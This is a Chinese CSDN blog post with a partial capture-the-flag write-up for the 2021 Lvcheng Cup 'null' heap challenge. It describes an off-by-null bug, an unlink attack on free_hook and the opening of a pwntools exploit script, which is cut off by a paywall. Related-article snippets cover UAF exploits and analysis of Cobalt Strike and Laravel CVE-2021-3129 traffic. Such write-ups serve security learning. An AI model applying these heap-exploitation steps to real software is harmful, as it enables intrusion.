绿城杯 null

最新推荐文章于 2024-10-02 10:53:34 发布
最新推荐文章于 2024-10-02 10:53:34 发布
阅读量227 收藏
点赞数
分类专栏: # glibc 2.24 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46441427/article/details/120578669
版权

题目特征


在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

思路

在这里插入图片描述

j8题不给libc恶心人,平时也没有用libcsearcher的习惯,这道题给了堆存储的数组,read_input这里有个洞off by null,多申请0x8然后可以覆盖pre_inuse位,那就用unlink来打,修改free_hook。

# -*- coding: utf-8 -*-
from pwn import *
elf=ELF('./1')
p=remote('82.157.5.28',51004)
libc=ELF('libc6_2.23-0ubuntu11.2_amd64.so')
context.log_level='debug'

def alloc(idx,size,content):
    p.sendlineafter('Your choice :','1')
    p
最低0.47元/天 解锁文章
Akura@lan
关注
专栏目录
【pwn】2021 绿城(部分)
woodwhale的博客
10-04 3555
【pwn】2021 绿城(部分) 前言 补题,这场没报名,比赛的时候机房唯一报名的战队pwn穿了(tql),就没去做了 1、uaf_pwn 简单的uaf,free之后之后没有置0,直接申请unsorted bin泄露libc,再double free改malloc_hook写入one_gadget exp如下 def add(size): sla(">","1") sla("size>",str(size)) def free(index): sla("&gt
从一道例题分析CS流量解密
AomCC的博客
09-26 713
2021绿城misc流量分析,CS流量解密
绿城-Misc-流量分析
qq_49422880的博客
03-15 3236
绿城-Misc-流量分析0x01 复现开始 0x01 复现开始 导出HTTP对象后开始浏览数据包,发现数据包中有奇怪的流量。 经过网上查询, 找到这是CVE-2021-3129 漏洞攻击特征,发现这是一种lavarel的流量数据包,是一个远程RCE的一个漏洞。这个流量是经过加密处理的,需要我们进行还原。 将AAA*去掉 把=00换为空 base64解码 <?php $str = 'P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00
2021 绿城 wp
qq_45603443的博客
10-13 1191
2021 绿城 wpWebezcmsezphpMisc[warmup]⾳频隐写ReeasyreCryptoRSA1[warmup]加密算法Pwnnull_pwnuafGreentownNoteTip Web ezcms ciscn华东北分区赛awd的链⼦ <?php namespace think\cache\driver { class File { protected $options=null; protected $tag; function __construct(){ $th
2021年“绿城”网络安全大赛-PWN-GreentownNote
qq_43264813的博客
09-30 485
2021年“绿城”网络安全大赛-PWN-GreentownNote 题目名称:GreentownNote 题目内容:欢迎参加绿城~ 题目分值:200.0 题目难度:中等 相关附件:GreentownNote的附件3.txt 解题思路: 1.检查保护 保护全开 2.函数分析 题目只给了add,show,delete add() show() delete() 3.思路 (1)首先free泄露libc (2)构造heap srop 照题目环境2.27,应该是攻击free_hook,把它的值改成set_
2021绿城pwn部分wp
eeeeeight的博客
09-29 1184
前言: 这次比赛了解到了还有jspwn这玩意, 然后没时间学(, 十月一定(逃) uafpwn: 释放之后指针未置零, 所以use after free乱打 from pwn import * context(log_level = 'debug', arch = 'amd64') # sh = process('./uaf_pwn') sh = remote('82.157.5.28', 52102) elf = ELF('./uaf_pwn') libc = elf.libc def add(siz
2021年“绿城”网络安全大赛-Misc-流量分析
qq_43264813的博客
09-30 8233
2021年“绿城”网络安全大赛-Misc-流量分析 题目名称:流量分析 题目内容:一道复杂的流量分析 题目分值:200.0 题目难度:中等 相关附件:流量分析的附件.zip 解题思路: 1.流量过一遍。发现.config.php 是 webshell。找攻击者如何写入 webshell。发现存在一些可疑的 POST 流量,UA 头是 python requests。通过返回包发现程序报错。使用 Laravel。 发现流量中可疑的字符串。 2.网上查找资料发现是 CVE-2021-3129 漏洞攻击特征。
2021年“绿城”网络安全大赛
09-30
2021年“绿城”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
绿城 CTF 2021 真题 (1).rar
12-07
绿城 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
绿城2021 Web1
08-03
在这个例子中,通过“绿城2021 Webgit泄露”我们可以推断,参赛者可能能够通过某种方式获取到了网站的`index.php`源码。这暴露了网站的内部结构和可能的漏洞。 2. PHP编程:`index.php`文件展示了PHP的基本用法,...
[2021绿城] [Misc] 流量分析 + cobaltstrike 流量解密
ShenZ的博客
03-17 5351
2021年“绿城”网络安全大赛-Misc-流量分析 1.webshell分析 2.解密 cobaltstrike 流量 (1)分析`.cobaltstrike.beacon_keys`得到私钥 (2)通过私钥解密元数据、获取 `AES KEY` (3)解密cs流量 框架是Laravel,利用CVE-2021-3129命令执行写马。 分析发现webshell是/.config.php tcp.stream eq 2509
2021年绿城Light1ng战队Writeup
Le1a's Blog
09-30 3221
Light1ng战队 一、战队信息 名称:Light1ng 排名:16 二、解题情况 进不去平台了,没法截图了 三、解题过程 Web 1.ezphp ezphp 在关于里看到个Git,所以考虑存在git泄露 index.php里的php代码 <?php if (isset($_GET['link_page'])) { $link_page = $_GET['link_page']; } else { $link_page = "home"; } $page_file = "pages/"
2021暗泉 misc
mumuzi的博客
12-06 1424
拿了一血就得交wp有点太看的起我了,所以不交( Misc range_download 附件挺大,打开之后发现有很多tcp的流只传输了一个字节,根据题目名字可知这道题是在仿照强网的慢传输(Extremelyslow) 利用的是断点续传,强网传的是data,而range_download传的是media.type 于是用tshark将其导出 .\tshark.exe -r .\range.pcapng -T fields -e http.response.line -e media.type -Y ht
2021年“绿盟”重庆市大学生信息安全竞赛部分wp
qq_36410265的博客
12-27 940
2021年“绿盟”重庆市大学生信息安全竞赛部分wp
绿城2021 Crypto writeups
weixin_56678592的博客
09-29 524
绿城2021 Crypto writeups #1 warmup: 题目: from Crypto.Util.number import * from flag import flag assert flag[:5]=='flag{' str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' def encode(plain_text, a, b, m): cipher_text = '' for i in plain_tex
2021绿城 RE WP
abelxu
09-29 3310
逆向(100分题) 变异RC4,关键点是密钥盒S的生成过程被魔改了。RC4原理参考之前的博客 基本流程 1.初始循环填充key,key=“tallmewhy” 2.计算密钥盒S,但是不是标准的RC4算法。可以通过dump的方法将密钥和提取 3.ebp+ecx+var_534中是密文 由于不想看魔改的S盒生成算法,所以在S盒生成完成的地方下断点,dump S盒填充就可以了。 exp #include<stdio.h> #include<string.h> struct rc4_
(笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
最新发布
haidizym的博客
10-02 429
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python
遥感影像-实例分割数据集:iSAID 从切图到YOLO格式数据集制作详细介绍
GIS潮流
09-30 1078
开源数据集isaid标注包含实例分割,但是原始影像太大,很吃显存,一般显卡无法用原始影像直接训练,所以需要对影像进行裁剪,并生成对应的标签,因为想用yolo系列跑模型,所以将标签需要转为txt格式。
绿城2021 Webgit安全漏洞:index.php源码泄露
在"绿城2021 Web1"的事件中,涉及到了一个可能的安全漏洞泄露,其中的核心是关于ezphpgit项目的index.php源码。这个文件是web应用的一部分,主要用于处理URL参数并决定加载哪个页面内容。代码片段展示了如何通过$_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值